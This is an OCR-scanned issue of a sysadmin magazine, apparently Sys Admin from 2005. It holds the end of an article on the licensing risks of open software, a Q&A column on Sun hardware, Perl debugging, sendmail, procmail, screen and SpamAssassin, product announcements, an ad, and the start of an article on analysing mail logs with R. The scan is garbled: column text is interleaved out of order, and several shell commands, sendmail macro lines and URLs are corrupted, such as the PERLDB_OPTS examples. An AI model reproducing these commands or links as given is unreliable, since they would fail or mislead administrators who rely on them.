compatible solution. 

Software or IP Requirements 

Software that relics on platiorms, libraries and other compo¬ 
nents, especially those that both technical and licensing require¬ 
ments that are incompatible with the software license, introduce 
a major, but often overlooked, risk. A company cannot afford to 
use any “open software” when both technical and licensing 
requirements are not met. Much software requires support 
beyond the control of the entity actually licensing the software. 
No recourse with the copyright holder may be possible if these 
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requirements go unmet, as they are external to the software pur¬ 
chased and under contract. 

Freedom ware that requires software or IP licenses (e.g., non-open 
patent licenses) should be considered sourceware. If the sourceware 
relies on software that is not “open”, such as OS. libraries, data¬ 
bases. or other system/network interfaces, what steps can be made 
to mitigate the risk of these requirements not being available? Is the 
sourceware also available as freedom ware whereby it does not 
require these "closed" capabilities? If so. why is it not being imple¬ 
mented as such? This risk may even transgress into the realm of 
indemnification, whereby software has external requirements, 
which are unlicensed by the organization deploying it. 

Standardware risk mitigation should avoid these external 
requirements as well. If it does not. has the commercial entity guar¬ 
anteed access to these requirements? Have they explained why they 
are required for the system and why they are not using "open" 
requirements? Do they offer or is there equivalent freedomware that 
does? Nothing is worse from a risk standpoint than licensing and 
implementing a product that does not contain everything necessary 
to function, and where the licenser cannot be held liable for those 
other requirements. Indemnification is a reai issue for entities, 
regardless of software license. 

Examples of Mitigating Open Software Risk 

The theory and discussion is nice, but examples go a long way 
toward explaining how real-world "open" software mitigates cor¬ 
porate risk. Let's consider an "open" office suite, document/print 
rendering language, Web browser, and Web authoring tools, 

OpenOffice XML — Freedomware, 
Standardware, and Sourceware 

The "open" office suite is highlighted by and starts with Sun's 
acquisition of Star Division. Sun released the source code of StarOffice 
5 to the community under a dual-license strategy of freedomware 
LGPL <Lesser GPL) and sourceware SCSL (Sun Community 
Source License). To protect its copyright of the software, under the 
OpenOffice.org project, Sun recommends all developers who sub¬ 
mit more than 10 lines of code sign over a non-exclusive copyright 
to Sun. The eventual result of the community-driven development 
(with half of the OpenOftice.org team being paid employees of 


Sun) was a complete set of XML standards that have been fully 
standardized by OASIS as OpenOffice XML. The end-user prod¬ 
ucts include the freedomware LGPL OpenOffice.org suite and the 
standardware StarOffice product. 

Considering the factors of risk, the OASIS standardization of 
OpenOffice XML was supported by not only Sun. but also by Corel 
(another suite developer) and Boeing (the de facto standard setter in 
the engineering world for corporate-wide documentation, from 
office to factory floor). In addition to the OpenOffice.org and 
StarOffice products, the LGPL license on the code means any and 
all commercial software is free to use the code for either inherit or 
import/export support. This has occurred in many products, from 
AOL's office suite to the WordPerfect series of products from Corel 
(discussed below under "closed software"). Likewise, under the 
LGPL license, any changes to the functionality of the code respon¬ 
sible for OpenOffice XML (not necessarily other components) must 
be shared with the OpenOffice.org project. In addition to Sun. these 
LGPL and SCSL licenses are also providing their own support. 

OpenOffice XML has become the standard for mitigating risk 
in documentation, from small offices to engineering giants like 
Boeing. The standardware StarOffice product includes release 
and configuration management component and support offerings 
from Sun. Many components are self-requiring and platform 
agnostic, reducing reliance on other system/library components. 
Thus, freedomware OpenOffice.org and standardware StarOffice 
are of minimal risk to adopt. 

Adobe Postscript/PDF — Freedomware, 
Standardware, and Sourceware 

For non-editable documentation and print publication. Adobe’s 
Postscript language is considered de facto standard freedom ware 
and sourceware. depending on Adobe IP (patents) involved. 
Freedomware can write PostScript and PostScript-derived PDF files 
that are free of Adobe IP. Various standardware and sourceware can 
write both IP and IP-free PostScript/PDF formats. Not surprisingly, 
OpenOffice supports direct export to PostScript/PDF. 

Adobe sells most of its software based on the capabilities of 
the end-user applications in comparison to freedomware and other 
standardware equivalents, and not by hording specifications of its 
document formats. 
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Documentation rendered in IP-free PostScript/PDF should be 
considered low-risk, although only for non-editable documenta¬ 
tion (use as appropriate). IP requirements may introduce some 
risk because they may not be viewable tinder IP-free free- 
domware. Adobe's financials are extremely positive, and the 
focus of their software is on offering value over freedomware and 
other equivalents. They are currently platform-centric to Win32 
and MacOS X, however. 

AOL-Netscape — Freedomware, 
Standardware, and Sourceware 

Like Sun's office suite, AOL-Netscape's browser is highlighted 
by the release of its source code. The result was the Gecko engine, 
which is licensed under a dual-MPL (Mozilla Public License)/com- 
mercial license. Gecko is embedded into countless devices and soft¬ 
ware. from phones to development suites. Unlike AOL-Netscape's 
prior version 4 and earlier browsers, the resulting Gecko engine and 
Mozilla source code complies fully and to the letter with many 
XML W3C Web standards, such as HTML. CSS. XHTML, and 
others. It also defines several new XML. OASIS-standardized for¬ 
mats. The end-user products include the freedomware Mozilla 
suite, individual software components (i.e.. Firefox, Thunderbird. 
Sunbird. etc.), and the standardware Netscape browser. Neither 
implements platform-specific capabilities, such as Win32 ActiveX, 
which coincidentally makes them lower risk from a network secu¬ 
rity consideration — regardless of platform, as the code is very 
platform-agnostic. 

Newer developments in both products include release and 
configuration management tools, and support is available from 
AOL-Netscape for standardware Netscape. Freedomware Mozilla 
and standardware Netscape should be considered low-risk. 

Macromedia Standardware and 
Sourceware 

Macromedia’s suite of products — Dreamweaver, Fireworks, 
and Flash — inherently support “open” standards also supported 
by various other freedomware, standardware. and sourceware. 
This includes many well-established XML standards, such as 
HTML. CSS. PHP. and other industry organization standards like 


Javascript. Macromedia also offers a proliferated, fully docu¬ 
mented. self-standard in Flash sourceware (which was not 
always the case), and increasing support for XML equivalents 
like Scalable Vector Graphics (SVG. which also offers motion 
vector graphics). Macromedia sells its products based on inherent 
features and project management capabilities, as well as end-user 
features, and not by hording specifications of its document formats 
(not even Flash). 

Using Macromedia products is low risk, depending on what 
features are utilized. IP requirements (largely Flash) increase risk. 
Financials are extremely positive, with standardware products 
offering value over freedomware and other equivalents. They are 
currently platform-centric to Win32 and MacOS X. however. 

Conclusion 

The risk to an organization’s long-term investment in data 
must be mitigated for an organization to survive. A successful IT 
professional must always discuss software adoption in terms of 
detailed risk reduction, not of revolution. In this article, 1 intro¬ 
duced three "open software" categorizations and dissected their 
factors of risk: 

• Freedomware (open source, open standard) 

• Standardware (closed source, open standard) 

• Sourceware (open source, closed standard) 

In Pari 2. I will expand on not only the remaining categorization, 
commerceware (closed source, dosed standard), hut will discuss 
a fifth categorization that may result from any type of software. 
Such software holds the data of an organization hostage, and is of 
the ultimate risk. Our graph can still represent it. just not in its 
current form. 

Bryan ./. Smith has an educational background in engineering < BSCpE, 
UC. /■) and has spent much oj ids 12-year career applying engineering prin¬ 
ciples of risk mitigation to corporate investments in the aerospace, civil, 
educational, financial . semiconductor, and software industries. For the past 
4 years, he has provided engineering. IT. and training services to a variety of 
clients, including managing financial network security at two Fortune 100 
companies Mr. Smith and Ids wife. Lourdes, live in Orlando. He can be 
reached at: b.j . SWT th@ieee. org. 
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Remote Access 
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2/1/05 

3/1/05 

Database 

July 

3/1/05 

4/1/05 

Security 

Aug 

4/1/05 

5/2/05 

For more detailed information, refer to 

the author 


guidelines on our Web site: www. syssdffli nniag. com. 
Please send proposals, manuscripts, and requests for 
guidelines to: 

Sys Admin 

Managing Editor 

Rikki Endsley 

Ema i 1: re ndsley @ c mp, com 

Phone: (785) 838-7555 
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Amy Rich 


Q We have an old Sun E250 that’s acting as a test database 
server. During a maintenance window, we replaced a power 
supply that had died, but the new power supply didn't work 
either. We then tried it with a known good power supply from a 
functioning machine and it still failed. Do we need to replace 
the backplane in the machine to get the second power supply 
back online? 



I’m a Bourne shell programmer who’s been thrust into the role 
of developing some Perl code. Is there anything in Perl similar 
*X to trace the program execution? 


A If you take a look at the man page for perl run, it suggests the 
following: 


A Most likely the problem is that you’ve run into an issue with 
^“\.the power supply memory latch function. From the E250 
product notes: 

1 he Sun Enterprise 250 power supply has a memory latch function 
that allows the power supply to remember its last power on/off state 
in response to a power outage or removal of the AC power cord. 

This feature allows The power supply to resume operation automat¬ 
ically once power is restored. It also enables hot-swapping of 
power supplies. 

Under some circumstances, this feature can be misdiagnosed as a 
power supply failure. If you remove a power supply from a system 
that is powered off and attempt a hot-plug installation into a system 
that is powered on. the power supply will remain in the Off state. 

This should not be interpreted as a power supply failure. To activate 
the power supply, simply turn the front pane! keyswitch from the 
Power-On position to the Diagnostics position, and then back to the 
Power-On position. Alternatively, you may press the Power-On key 
on a Sun Type-5 keyboard attached to the system. 

II theie is a hardware failure that’s not the power supply itself, it 
may be with the DC Power Distribution Board, part number 
501 -4683 or the system board, part number 501-5440. 

The E250 s power components are detailed at: 

http://sunsolve.sun.com/handbook_pub/Systems/E250/ \ 
component.power,htral 

The exploded system view is at: 

http://sunsolve.sun.com/tiandbook_pub/Systenis/E250/ \ 
component.exploded.html 

The wiring diagram is at: 

http://sunsolve.sun.coir/handbook_pub/Systems/E250/wiring_l.html 


Submit questions to: http: //www . sysadmi nmag. com/quest/ 


All these flags require -DDEBUGGING when you compile the Pert exe¬ 
cutable (but see Devel::Peek, which may change this). See the 
INSTALL file in the Perl source distribution for how to do this. This 
flag is automatically set if you include -g option when ‘'Configure" 
asks you about optimizer/debugger flags. 

It you're just trying to get a print out of each line of Perl code as it 
executes, the way that sh -x provides for shell scripts, you can't use 
Perl's -D switch. Instead do this: 

# If you have "env" utility 

erw=PERLD8_0PT$="NonStop-l AutoTrace-1 frame-2" perl -dS program 

# Bourne shell syntax 

$ PERLDB_OPTS="Non$top=l AutoTrace=l framed'' perl -dS program 
// csh syntax 

# tsetenv PERLDB_OPTS "NonStop=l AutoTrace=l frame=2"; \ 
perl -dS program) 

Vou can also try running Perl with -D1 ts to get some useful debug¬ 
ging output. c 


Q 1 run sendmail 8.12. 1 1 for a small subset of domains and know 
it reasonably well. I want to add some spam filtering function¬ 
ality, but I don t want to rely on a number of more complicated 
programs like procmail or milter, etc. I’m really looking for some 
rulesets that I can plug into my me file instead of additional pro¬ 
grams I can use to supplement sendmail. Any suggestions? 

A There are a number of hacks out there and a lot you can do 
ix.with DNSBLs and regular expression matching that could cut 
down on your spam. You can also use the access functionality to 
block huge swathes of IPs and/or domains if you want to really limit 
whom you receive mail from. If you’re looking for some pre-rolled 
rulesets, you might want to check SpamFiIters: 

http://www.visi.com/~hawkeyd/spamfilters.htirl 
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Be aware that your spam blocking could have a significant negative 
impact on vour mail delivery if you’re doing a lot of expensive 
lookups and/or handling a lot of mail. 

Q l've been looking at adding some extra RAM to an old Sun U5 
I have acting as a desktop. I’ve found some sites that say that 
they can sell me 256M strips, but Sun seems to claim that the U5s 
only support up to I28M strips and that I need a U10 for 256M 
strips. Can I actually put the 256M strips into the machine, or are 
the sites selling them incorrect? 

A The U5 and the LUO have exactly the same motherboard and 
support the same components. The difference between the U5 
and the LUO is the chassis. The U5 has a smaller chassis than the 
U10 and therefore didn’t have the room to hold full-height 256M 
DIMMs. If you purchase low-profile 256M DIM Ms. though, you 
can put them into the Ultra 5 without any modification. If you pur¬ 
chase regular-height DIMMs, then you’ll need to remove the 
floppy drive because the taller DIMMs get in the way of the UPA 
slot on the motherboard in the U5. 

Q l’ve been seeing a number of connections to sshd for the users 
"test” and "guest”. Neither of these accounts exists on my sys¬ 
tems, so I figured that this was some son of scanning effort by 
hackers to try to gel into my machines. Should I be concerned, or is 
this just simple fishing? 


A There are several ssh scanners that crackers are using these days. 

often distributed as ssh.tgz. One kit that I've seen contains a net¬ 
work scanner that scans a user-supplied netblock. collects IP 
addresses running sshd. then tries to connect to the identified host as a 
default user (guest, test. root, admin, etc.). Mostly these crackers are 
looking for default accounts/passwords set during an install of a spe¬ 
cific OS distribution. The payload could be easily adapted to exploit 
any holes in sshd. of course, but that’s not generally the aim. 

If you're running an OS without any default accounts/pass¬ 
words then you should be reasonably safe. For any non-user 
accounts, be sure to add them to the DenyUsers or DenyGroups 
line of the sshd configuration file as well as disabling the 
accounts at a system level (locking the password field, giving 
them invalid shells, and possibly also giving them invalid home 
directories). 

Q I have a 220R running Solaris 8. and I'm trying to run the 
sysdef command to get some information about the 
machine. When 1 run sysdef. I get a weird error. The command 
works fine on other machines of the same type running the same 
OS. though. I've deleted the actual hostid in the output below, but 
the rest is the same: 

* 

* Hostid 
* 

******** 

cannot open /dev/kmem 
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The permissions on /dev/kmem, the file it actually points to. and 
sysdef are: 

lrwxrwxrwx 1 root other 27 May 28 2002 \ 

/dev/kmem -> . ./devices/pseudo/nm@0:kirem 

crw-r. 1 root sys 13, 1 May 28 2002 \ 

/devices/pseudo/mm@0:kmem 

*r-xr-xr-x 1 root sys 31520 May 28 2002 \ 

/u$r/sbin/sparcv9/sysdef 

As far as I can tell, everything looks just fine, so why am I getting an 
error? 

A Presumably if you run this command as root it works fine? 

The sysdef binary needs to be SGID sys in order to be run 
by non-root users. Perhaps you've removed SG1D/SU1D permis¬ 
sions to harden this particular machine or someone accidentally 
or maliciously changed the machine. Check the md5 signatures 
on the system just to be certain if you don't know how the file 
got changed. 

Q We have a number of home users running Linux (Fedora Core 2) 
who need to set up a packet filter of some sort to increase secu¬ 
rity. We've told our users to install and configure iptables. but some of 
them aren't that technically inclined. Could you point me to some 
good resources to help the less Linux oriented users get up to speed? 


A There's a lot of information out there on iptables, starting with 
the Netfilter Web site: 

http://www.netfilter.0rg/documentation/i11dex.htiTil#documentation-howto 

If you're looking for something to help your users generate config¬ 
uration files without having much iptables knowledge, take a look at 
FireHOL: 

http://firehol.sourceforge.net/ 

While the configuration language still looks rather technical, it 
abstracts the iptables rules into more generic statements about the 
services that a machine runs. 

Q l'm trying to use sendmail 8.12. II LMTP with proemail as the 
local delivery agent. I've modified the me file thusly: 

define('L0CAL_MAIL8R_ARGS’, ’procmtil -Y -a $h -z’) 

define('L0CAL_MAILER_FLAGS’, 'SPXhmnz9') 

defineC'L0CAL_MA[LER_DSN_DIAGN0STIC_C0DE f , ’SMTP') 

Unfortunately, I'm losing the plussed detail when 1 try to deliver 
messages to multiple recipients. As an example, when a message is 
delivered to ma ry+de@doma i n .name and bob+tail©domain .name, 
the plus detail for both mary and bob is "de" because mary's address 
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was processed first. 1 realize that this is probably the side effect of 
the - a switch It) procmail, since the procmail man page says: 

-a argument This will set SI to be equal to argument, ft can be used 
to pass meta information along to procmail. Tins is typically done by 
passing along the $@x information from the sendmail mailer rule. 

So. how do 1 work around this so that each recipient gets the correct 
individual plus detail? 

A There’s an LMTP patch available for procmail 3.22 available 
from Claus ABmann’s Web page at Sendmail: 

http://www.sendmail.org/~ca/emai1/patches/procmai1.lmtp.pO 

After patching, invoke procmail as procma i 1 -z+ to get the correct 
LMTP functionality. 

Q I have a headless E280R running Solaris 9 that's being put into 
production to generate some graphs using in-house software. 
Unfortunately, this software requires a graphics device, so I've run 
Xvfb to simulate the hardware so that the product works. This 
worked fine when we were doing a small number of operations, but 
now that the machine is seeing more use. the CPU is bogging down. 
What’s the best way to work around this issue? Should I just add 
more CPU to the machine, install a graphics card, move the process 
off to another machine (very sub-optimal)? 

A There are a couple of things you could try to improve per¬ 
formance. First, I’d try to get your in-house software team 
to fix their software so that no graphics device was needed to 
render the images in the first place. Barring that, you can try to 
run additional Xvfb instances on different virtual displays if 
you're rendering multiple images at the same time and you have 
more than one CPU. This only works if the in-house application 
can direct its individual renderings to different displays, of 
course. If it can, youTl at least be utilizing both CPUs to do the 
work instead of serially hitting one CPU. You can also put in a 
graphics accelerator such as the XVR-500: 

http://www.sim.coin/desktop/prodjcts/graphics/xvr500/details.html 
http://sunsolve.sun.com/handbook_pub/Devices/Graphics/ \ 
GRAPH_XVR_5Q0.html 

The approach that works best w ill depend on the type/size of images 
being rendered and the capabilities of your in-house software, 
though. 

Q We’re using screen to connect to a terminal server and log 
console output for a number of machines. We run screen in 
detached mode because we’re mostly just interested in the log 
tiles. Occasionally, we need to kill off one of the screen windows 
since the console for a given machine hangs and needs manual 
intervention. We don’t really want to have to reattach to the 
screen session to do this, but it appears that that’s the only way to 
accomplish what we're after since screen -X will only send com¬ 
mands to the current attached window. Is there some sort ot 
macro or wrapper we can write to tell screen it should act on a 
window of our choosing? 


A Screen actually has a built-in mechanism that will handle 
this for you. If your screen session is detached, specify the 
*p flag in conjunction with the -X flag to tell screen that you 
wish to pre-select the specified window. From the man page 
(spelling errors corrected): 

-p number_or_name Pre-select a window. This is useful when you 
want to reattach to a specific window or you want to send a com¬ 
mand via the “-X" option to a specific window. As with screen's 
select command. selects the blank window. As a special case for 
reattach, "=“ brings up the w indow list on the blank w indow. 

-X Send the specified command to a running screen session. You can 
use the -d or -r option to tell screen to look only for attached or 
detached screen sessions. Note that this command doesn't w j ork if 
the session is password protected. 

So. to kill window 6 of your detached session on 843 . pts-4. hostname 
without actually doing a reattach: 

screen -r 848.pts-4.hostname -p 6 -X kill 

Q fm running SpamAssassin to try and catch the majority of 
spam that hits my inbox. Sometimes a piece of spam man¬ 
ages to pass through SA without getting flagged. I’ve also tried 
forwarding this spam to another system and it passes there, too. II 
I run SA on it by hand, though, it's very evidently tagged as 
spam. How come SA is missing some of the spam when it’s fil¬ 
tering a u to mat ically? 

A Without the specific piece of spam and more knowledge of 
your SA setup, it’s difficult to diagnose. A potential issue 
might be the size of the message, though. If you’re using the exam¬ 
ple procmail recipe, as shown below. SA only processes messages 
up to 256K. 

:Ofw: spamassassirt.lock 
* < 256000 
| spamassassin 

Also, spamc has a default maximum size of 250K. which can be 
increased by using the -s flag. From the spamc man page: 

-s max_size Set the maximum message si/e which will be sent to 
spamd — any bigger than this threshold and the message will be 
returned unprocessed (default: 250k). If spamc gets handed a mes¬ 
sage bigger than this, it w'on't be passed to spamd. 

The si/.e is specified in bytes, and if you send it a negative number, 
things are quite likely to break very hard. 

If you’re using a milter in conjunction with sendmail. look lor mes¬ 
sage size limits there as well. 

Amv Rich, president of the Boston-based Oceanwave Consulting, Inc. 
(http://wm.OCednwave.COm , has been a UNIX systems administrator for 
more than 10 years. She received a BSCS at Worcester Polytechnic Institute, 
and can be reached at: qna@0CedflW3 VO. COM. 
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Linux Netwosix 1.2 Released 

According to the company. Linux Netwosix is a distribution for 
servers and network-security related jobs. It can also be used for 
special operations, such as penetration testing, with its collection of 
security-oriented software and sources. It's a light distribution cre¬ 
ated to be portable and highly configurable. Linux Netwosix also 
has a ports system (Nepote) similar to the xBSD systems but more 
flexible. For more information, visit: http:/Avw\v.net\yosi.x.org. 

Pointsec for Linux Announced 

Pointsec announced that it is broadening its endpoint security 
solutions to encompass Linux. According to the company. Pointsec 
for Linux enables users to protect their confidential data stored on 
laptops and desktop computers running Linux. Pointsec T s data 
encryption solutions enable secure deployment of mobile devices. 
Pointsec can provide automatic encryption and decryption that is 
transparent to users and does not impede performance or produc¬ 
tivity. Pointsec supports major operating system for PCs. PDAs, 
and smart phones and secures information stored on the mobile 
devices and on removable memory media with full-disk encryp¬ 
tion. Pointsec for Linux will be available in early 2005. For more 
information, visit: http://www.pointsec.com. 

Constant Data Supports 2.4 and 2.6 
Linux Distributions 

Constant Data announced improved Linux support for its 
Constant Replicator real-time data replication software solution. 
According to the company. Constant Replicator for Linux release 
4.0 extends Linux coverage by providing support for all 2.4 and 2.6 
kernel-based Linux distributions. Examples of supported Linux 
operating systems include Red Hat Enterprise Linux AS and ES. 
Debian 3.0. and Novell/SUSE Linux Enterprise Server 8 and 9. For 
more information, visit: http://\\'w\\\constantdata.com . 

Cluster Resources Introduces 
Moab Cluster Suite 

Cluster Resources, Inc. announced the release of Moab 
Cluster Suite 4.2 for Mac OS X. According to the company, it is 
the first release of Cluster Resources' cluster management suite to 
support the Mac OS X platform and includes: Moab Workload 
Manager, a policy-based workload management and scheduling 
engine: Moab Cluster Manager, a graphical cluster administration 
interface, monitor, and reporting tool; and Moab Access Portal, 
an end-user job submission and management portal. Moab 
Cluster Suite 4.2 also supports Linux and Unix-based server plat¬ 
forms and Mac OS X. Linux. Unix, and Windows clients. For 
more information, visit: hup:/A m’ir. clusterresources.com 


BGSoft Announces Network Searcher 3.6 

BGSoft announced version 3.6 of its file searching utility. 
According to the company. Network Searcher 3.6 allows for tile 
searches on local networks (LAN) and customized results report¬ 
ing. as well as multimedia tiles recognition for files displayed in 
search results. Network Searcher utilizes multiple searching 
processes running simultaneously (threads) to enable network users 
to search for various types of files and data contained in files based 
on an extensive set of criteria. For more information, visit: 
http:/Av\\'\v. bgsoft. net. 

Wise Solutions Unveils Wise Package 
Studio 5.5 

Wise Solutions (a wholly-owned subsidiary of Altiris, Inc.) 
released Wise Package Studio 5.5. According to the company. Wise 
Package Studio 5.5 gives systems administrators the ability to 
quickly assess and test critical software patches prior to deploy¬ 
ment. For more information, visit: http:/A\ww.\vise.comA\ps.asp. 

Barracuda Announces Spam Firewall 800 

Barracuda Networks, Inc. announced the Barracuda Spam 
Firewall 800, the first carrier-class spam appliance available for 
large organizations and Internet Service Providers (ISPs). 
According to the company, the Barracuda Spam Firewall 800 offers 
the fastest throughput available for an email gateway appliance and 
is capable of handling spam at a rate of nearly 1.3 million messages 
per hour. 

The Barracuda Spam Firewall 800. which supports 30.000 active 
users, is designed for large enterprises. The Barracuda Spam 
Firewall 800 includes several advanced capabilities including redun¬ 
dant hot swap power supplies. RAID 5 disk storage, dual gigabit 
Ethernet ports, in addition to the features offered with Barracuda 
Spam Firewall 600. Multiple Barracuda Spam Firewall 800 units 
can be clustered for greater redundancy and higher capacity. 

The Barracuda Spam Firewall 800 is currently available and 
priced at SI7,999 for the appliance and S3.999 per year for sub¬ 
scription to the Energize Update service. For more information, 
visit: http:/Av\\'\i\barracu(Iarienvorks.com. 


Appro Unveils AMD Opteron-Powered 
XtremeBiade Solution 

Appro recently unveiled its new XtremeBiade solution, which 
begins shipping in early 2005. According to the company, the 
Appro XtremeBiade is the next generation blade solution offering 
Infiniband interfaces to all external data and storage networks. 
This solution provides added efficiency to large-scale deploy¬ 
ments while adding a processor flexibilily and scalability. It is 
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also designed tor high-availability by offering hot-swappable 
blades, redundant power supplies and cooling fans, as well as 
integration of key components such as network switches and 
centralized management. 

The Appro XtremeBlade solution features six sub-racks housing 
up to 12 blade servers in each sub-rack. An XtremeBlade Cluster 
can support up to 72 blade servers in a single rack cabinet solution. 
This solution mixes blade configurations from 2-way. 4-way, and/or 
8-way in the same sub-rack clustering infrastructure. Appro 
XtremeBlade solution also offers a variety of configuration options 
including Appro DAS/NAS/SAN based storage solutions and a 
choice of Windows and Linux operating systems. For more infor¬ 
mation. visit: http://www.appro.com. 


NextCom Announces the FlexPCServer 
Series 

NextCom LLC announced its briefcase notebook and mobile 
server with Single or Dual Xeon to 3.06GHZ (Enterprise Linux 
and Windows ASJ. According to the company, the FlexPCServer 
provides extreme performance computing in a portable form and 
is a complete server and high performance graphics workstation 
providing maximum flexibility with up to three internal media 
bays, flexible external storage options via 160MS/Sec SCSI. 
Fiber Channel, serial ATA and USB 2.0. including high-capacity 
drives to 500GB. It can also help you leverage the low cost of the 
USB 2.0 peripheral market, while sharing riles with other Sun 
workstations, Linux desktop, Solaris 9x86. enterprise operating 
systems, Enterprise Linux, Microsoft Windows XP Pro, 2000 Pro, 
and Windows Server 2003. 

For more information, visit: http.'/Avw'w. nextconjputing.com. 

Logical Solutions Introduces Global-Link 

Logical Solutions announced Global-Link, a new product 
for the secure transmission of high-resolution video, keyboard, 
and mouse using TCP/IP. According to the company, Global- 
Link represents the culmination of a collaboration between 
Logical Solutions and scientists at Sandia National Laboratory 
under the Department of Energy National Nuclear Security 
Administration’s Advanced Simulation and Computing 
Program (ASC). 

Global-Link does not require client/server software, licensing, or 
non-secure browsers. The Global-Link system consists of an 
encoder connected to the source computer and a local KVM con¬ 
sole. and a decoder that connects to a remote keyboard, mouse, and 
video display device. The keyboard and mouse at each end may be 
PS2, USB. or legacy Sun. Video sources may be cither DVI (digital) 
or RGB (analog). The decoder can output either DVI or RGB 
video, allowing the use of digital Bat panel or analog monitors. 
Patented differencing algorithms are used to send only frame to 
frame pixel changes in the video. The Global-Link is not operating 
system dependent and will work with Windows. Linux. Unix, and 
USB-based Apple Computer environments. Global-Link has 
10/100 Base-T and 1,000 Base-T copper network connections and 
a GB1C slot for fiber optic 1.000 Base-T. For more information, 
visit: http:/Av veu: thinklogical.com. 


Trigence Announces Solaris Support 

Trigencc Corp. announced Trigence AE 2.2 with support for 
Solaris. According to the company, Trigence AE 2.2 (available in 
early 2005) is an application virtualization solution that uses a 
container approach to help data centers achieve high availability 
and flexible application lifecycle management. Sun Solaris cus¬ 
tomers using Sun’s N1 container approach can add Trigence AE 
above N1 to provide portability, easy provisioning, and on- 
demand delivery with Sun’s Solaris 10 containers. Customers 
who intend to remain on Solaris 9 can utilize containerization 
with Trigence AE while at the same time building a migration 
route to Solaris 10 when they are ready. Trigence AE will be 
jointly marketed by Sun and Trigence Corp. For more information, 
visit: http://w\vw.trigence.com . 

Vintela Updates Open-source 
Development Tools 

Vintela announced availability of enhanced versions of 
OpenSSH and Pu7 IY lor Vintela Authentication Services 
(VAS). According to the company, both open source projects, 
which arc designed to help Vintela customers create a true single 
sign-on solution using Active Directory and VAS. are available 
from Vintela’s Resource Central online solution community 
(http://www.rc.vintela.com). 

Combined, OpenSSH for VAS and PuTTY for VAS allows 
users to establish sessions from Windows-to-Unix, or from Unix- 
to-Unix using the OpenSSH Remote Secure Shell (SSH). Resource 
Central provides binary packaging for OpenSSH on Linux, Solaris, 
HP-UX, and AIX platforms. For more information, visit: 
http://www. vintela. com. 


SSH Tectia Supports New Platforms 

SSH Communications Security announced that it has added 
support for Red Hat Enterprise Linux V2.I and V3.0, Solaris 9, 
Windows 2000, and Windows 2003 Server to its FIPS 140-2 certi¬ 
fied encryption module used in its SSH Tectia client/server solu¬ 
tion. According to the company, these added platforms make SSH 
Tectia the leading heterogeneous FIPS supported Secure Shell 
solution. For more information, visit: http://www.ssh.com. 

r —--—-—. r|TT — -^ i bbi ^ p h i i i i i r-——" rrn TT HUj iLCitm. 

Digi Introduces Digi One IAP 

Digi International introduced an enhanced Digi One IAP 
industrial device server. According to the company, this new 
release is the industry’s first truly interoperable device server 
featuring industrial protocol bridging. Protocol bridging enables 
industrial Ethernet and serial protocols to transparently inter¬ 
communicate. MODBUS, Allen Bradley, and ASCII devices 
such as Programmable Logic Controllers (PLCs), drives, bar 
code readers, scales, and RFID devices, can now be integrated. 
The enhanced Digi One IAP also features 64 socket connections. 
For more information, visit: http://www.digi.com. 
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Opteron™, Xeon™ EM64T, and ltanium®2 

■ 


Innovative Technology and Services at Competitive Prices 


* NEW! Microway Quadputer®-Navion™ enterprise- 
class server incorporates 4 Opteron 850 processors in 
4U chassis with hot-swap, redundant power supplies 
and hard drives. For other 64-bit solutions, go to 
www.microway.com. 


Expert Integration *** 

Microway offers innovative, competitively priced, custom designed clusters 
with NodeWatch™ management and monitoring tools. Our solutions incor¬ 
porate the latest processors, proprietary cooling and storage solutions, plus 
high-speed Myrinet and InfiniBand interconnects for demanding applications. 


* NodeWatch™/MCMS™ provides remote control 
and monitoring of vital cluster parameters and failsafe 
shutdown. NodeWatch monitors temperatures, volt¬ 
ages, and chassis fans, runs off the master node, and is 
controlled by a secure web-based GUI. Available only 
on Microway HPC solutions. 

• Fully redundant, highly-available storage systems 

based on fiber channel technology for multi-terabyte 
storage requirements. State-of-the-art storage direc¬ 
tors for full access from any cluster node. Easily scales 
to address rapidly expanding storage requirements. 


Superior Service and Tech Support ... 

We understand that on-time delivery, out-of-the-box reliability and excellent 
ongoing technical support are critical to our users. Microway offers profes¬ 
sional services from specialists with a wide range of expertise in HPC appli¬ 
cations. On-site installations and training are also available. 

Satisfied Customers ... 

AT&T, Cessna, GE, GSK, Johnson & Johnson, LANL, LLNL, MBL, 
Millennium Pharmaceuticals, NIH, Northrop Grumman, Raytheon, Sandia, 
Seagate, US Air Force. Army, Navy, NASA, NOAA and hundreds of lead¬ 
ing universities are among our satisfied customers since 1982. 



Call us first at 508-746-7341 for 
quotations and benchmarking services. 
Find technical information, testimonials , and 
online newsletter at www.microway.com. 


“ The Brain Imaging Research Center (a joint center of Carnegie 
Mellon University and University of Pittsburgh) decided to 
purchase our Linux cluster from Microway because of the 
proven performance of their clusters at Carnegie 
Mellon in the processing of high-volume brain 
imaging data. Microway was flexible and helpful 
at all stages, starting from the initial custom 
configuration and ending with timely delivery 
and full installation.” 

- Marcel Just, Co-Director, 
Brain Imaging Research Center 


Quadputer'-Navion™ 

with four AMD Opteron 850s 
plus hot-swap, redundant 
ower supplies and hard drives. 


Microway CoolRak™ Cabinet 

with dual Opteron or Xeon 
1U nodes, Myrinet connectivity 
and four 10" 535 CFM rear fans. 
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A Mail Server Application 

Log files from a Postfix mail server are 
going to be used in this simple application. 
The data of interest in the log files includes 
the main DNS domain (.gr, .com, etc.) of 
the outgoing mail address, the delay dura¬ 
tion (in seconds), and the time (in 
HH:MM:SS format) of the day. For getting 
the data. grep. sed, and awk were used. 
(Perl or another script language could have 
been used instead.) The first 10 lines of the 
data, including the column titles, are shown 
in Table 2. 

Extracting Information 

What information can we get from the 
data using R? Summary info (using the 
summary() command) can be extracted, 
which in this particular case gives: 

> summary(MAILD^ATA) 

Time Domain 
11:07:12: 5 au : 3 

08:51:05: 3 com: 10 
13:23:47: 3 edu: 2 

06:12:53: 2 gr :117 
16:42:34: 2 o rg: 11 

00:52:50: 1 uk : 2 

(Other) :129 

> 

This tells us that most of our emails go to 

the .GR domain and that the busiest 

moment (relatively busy because those log 

files were from my home dial-up server) is 

11:07:12. Instead of Time, you can use 

* 

Day, Week, Month, or even Year variables 
for getting mail information. The fact that 
the 3rd Qu. value is very close to the 
Median means that there are not major 
delays in the sending of the outgoing mes¬ 
sages process, at least for the 75% of the 
items in the data set. If you want more 
precise information, you can divide the 
data set into smaller data sets. 

Output Explanation 

The Time and Domain data are not 
numbers, so R sums the occurrences (con¬ 
sidering each value as a string) of each 
"string" and prints the top numbers. As far 
as Delay (which is numeric) is concerned, 
R calculates and displays the following six 
values: 

• Min. — This is the minimum value of the 
data set. 

• Median — This is an element that divides 
the data set into two subsets (left and 
right subsets) with the same number of 
elements. If the data set has an odd num¬ 
ber of elements, then the Median is part 
